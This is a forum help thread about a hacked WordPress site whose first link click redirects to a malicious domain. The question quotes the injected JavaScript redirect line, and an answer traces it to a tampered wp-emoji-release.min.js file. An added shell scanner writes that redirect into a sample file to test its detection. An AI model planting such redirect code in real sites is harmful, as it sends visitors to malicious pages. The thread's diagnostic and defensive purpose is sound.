
I have a website that is running on an AWS server using the Bitnami Nginx and WordPress image.

https://www.athleticclubhk.com/

Recently it got all our ads on Google stopped due to malicious content. Oddly this time, it's trickier than your standard malware of infected files. When visiting the site incognito, the first and only the first link click gets redirected using the following code:

window.location.replace("https://cartoonmines.com/scount");window.location.href = "https://cartoonmines.com/scount";

This is being injected on any link, however, upon investigating the loaded code on inspect it's not injecting it into the page.

I’ve tried to hunt down the theme, plugins, core files and found nothing!

I replaced and reinstalled WordPress core files, deactivated all plugins and even swapped the theme – the problem is still there. I can’t find any hidden .htaccess file in the entire root directory.

I even used GREP to try to look for anything fishy (any clues here that someone can help with?) nothing so far.

The site is still impacted with this so you can easily load the link ~ I do use Malwarebytes to keep myself protected, in case you are opening this directly.

Can anyone help?

3 Answers


    1. Disable plugins and check again.
    2. Change the database username and password.
    3. Ask the hosting manager to check the host.
  1. The redirection code is implanted in /wp-includes/js/wp-emoji-release.min.js.

    How to confirm:

    • watch the cookies when clicking an internal page: a new cookie named ht_rr is being set for tracking first clicks
    • save the complete webpage locally and try to load it, then check in Chrome dev tools: you'll see that the Console tab complains about this JavaScript file attempting to set the aforementioned cookie

    While a temporary resolution of deleting the file will fix things for some time…

    There’s no excuse for not setting up a proper server stack. Bitnami or other "great stacks" won’t cut it security-wise. They exist for "fast", but no "quality" setup, and of course, it’s never going to be secure.

    The file got created somehow / had write privileges. This indicates a problem with the setup most of the time. Unless you’re using some nulled plugins or plugins from bad sources.

    Once again, since the website was essentially "pwned", deleting the JavaScript file does not mean complete disinfection. To preserve things in a secure state, I would recommend setting things on a clean server environment with strict PHP-FPM permissions aka "lockdown" chmod, and look for write errors to look for infected PHP files.

    Check out some guides on the matter of secure NGINX/PHP-FPM setup:

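Added example, not written by anyone in this thread: a shell check that sweeps a webroot for the two indicators named above (the ht_rr cookie and a window.location redirect to a host other than the site's own) and lists code files that group or others can write. The function names, the sample tree and the host www.example.test are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the thread. Indicators are the two named above:
# the ht_rr cookie and a window.location redirect to a foreign host.
TAB=$(printf '\t')
# window.location.replace("http(s)://host...  or  window.location[.href] = "http(s)://host...
REDIRECT_RE="window\.location(\.href)?[[:space:]]*(=|\.replace\()[[:space:]]*[\"']https?://[^/\"']+"

# scan_js ROOT SITE_HOST -> lines of "<finding><TAB><file>" for .js files under ROOT
scan_js() {
  root=$1 site_host=$2
  {
    # JS that touches the first-click tracking cookie
    find "$root" -type f -name '*.js' -exec grep -l 'ht_rr' {} + |
      sed "s#^#cookie:ht_rr${TAB}#"
    # JS that navigates to an absolute URL whose host is not the site's own
    find "$root" -type f -name '*.js' -exec grep -HoE "$REDIRECT_RE" {} + |
      sed -E "s#^(.*):window\.location.*://(.*)\$#\2${TAB}\1#" |
      awk -F "$TAB" -v own="$site_host" '$1 != own { print "offsite-redirect:" $1 "\t" $2 }'
  } | sort -u
}

# writable_code ROOT -> .js/.php files that group or others can write.
# Assumption: the PHP-FPM user is not the file owner, so these are what it could modify.
writable_code() {
  find "$1" -type f \( -name '*.js' -o -name '*.php' \) \( -perm -020 -o -perm -002 \) | sort
}

# demo: constructed sample tree (contents are made up, modelled on the snippet in the question)
demo() {
  d=$(mktemp -d) && mkdir -p "$d/wp-includes/js" "$d/theme"
  printf '%s\n' 'document.cookie="ht_rr=1";window.location.replace("https://cartoonmines.com/scount");' \
    > "$d/wp-includes/js/wp-emoji-release.min.js"
  printf '%s\n' 'window.location.href = "https://www.example.test/cart";' > "$d/theme/nav.js"
  chmod 666 "$d/wp-includes/js/wp-emoji-release.min.js"; chmod 644 "$d/theme/nav.js"
  scan_js "$d" www.example.test; writable_code "$d"; rm -rf "$d"
}

# With two arguments scan a real tree, otherwise run the constructed demo.
if [ "$#" -eq 2 ]; then scan_js "$1" "$2"; writable_code "$1"; else demo; fi
```

Run it as `sh scan.sh /path/to/webroot www.yoursite.example`; a hit is a lead to inspect, since legitimate scripts can also redirect to other hosts.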
  2. Just had the same problem and it was Zend Font Plugin, the same that some people mentioned before.

    Installed Wordfence and this came out. Deleted the plugin and now the site is working perfectly.
